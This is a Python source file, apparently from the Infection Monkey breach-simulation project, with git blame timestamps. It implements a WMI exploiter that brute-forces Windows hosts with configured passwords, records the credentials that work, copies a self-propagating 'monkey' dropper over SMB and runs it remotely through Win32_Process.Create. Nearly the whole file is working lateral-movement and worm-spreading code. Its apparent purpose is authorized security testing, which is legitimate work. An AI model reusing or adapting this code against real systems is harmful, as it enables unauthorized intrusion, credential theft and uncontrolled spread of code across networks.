monkey/chaos_monkey/exploit/wmiexec.py

107 lines
4.4 KiB
Python
Raw Normal View History

2015-08-30 15:27:35 +08:00
import socket
import ntpath
import logging
import traceback
from model import DROPPER_CMDLINE, MONKEY_CMDLINE, MONKEY_CMDLINE_HTTP
2015-08-30 15:27:35 +08:00
from model.host import VictimHost
from exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, HTTPTools, AccessDeniedException, get_target_monkey
2015-08-30 15:27:35 +08:00
LOG = logging.getLogger(__name__)
class WmiExploiter(HostExploiter):
_target_os_type = ['windows']
2015-08-30 15:27:35 +08:00
def __init__(self):
self._config = __import__('config').WormConfiguration
@WmiTools.dcom_wrap
def exploit_host(self, host, src_path=None):
2015-08-30 15:27:35 +08:00
assert isinstance(host, VictimHost)
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
2015-08-30 15:27:35 +08:00
passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user)
if known_password is not None:
if known_password in passwords:
passwords.remove(known_password)
passwords.insert(0, known_password)
for password in passwords:
LOG.debug("Attempting to connect %r using WMI with password '%s'",
host, password)
wmi_connection = WmiTools.WmiConnection()
try:
wmi_connection.connect(host,
self._config.psexec_user,
password)
except AccessDeniedException:
LOG.debug("Failed connecting to %r using WMI with password '%s'",
host, password)
continue
except socket.error, exc:
LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",
host, password, exc)
return False
except Exception, exc:
LOG.debug("Unknown WMI connection error to %r with password '%s' (%s):\n%s",
host, password, exc, traceback.format_exc())
return False
host.learn_credentials(self._config.psexec_user, password)
# query process list and check if monkey already running on victim
process_list = WmiTools.list_object(wmi_connection, "Win32_Process",
fields=("Caption", ),
where="Name='%s'" % ntpath.split(src_path)[-1])
if process_list:
wmi_connection.close()
LOG.debug("Skipping %r - already infected", host)
return False
#copy the file remotely using SMB
2015-08-30 15:27:35 +08:00
remote_full_path = SmbTools.copy_file(host,
self._config.psexec_user,
password,
src_path,
self._config.dropper_target_path)
if not remote_full_path:
2015-10-08 18:32:26 +08:00
wmi_connection.close()
return False
2015-08-30 15:27:35 +08:00
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path.lower():
2015-08-30 15:27:35 +08:00
cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}
else:
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
# execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
ntpath.split(remote_full_path)[0],
None)
if (0 != result.ProcessId) and (0 == result.ReturnValue):
LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)
success = True
else:
LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)
success = False
result.RemRelease()
wmi_connection.close()
return success
return False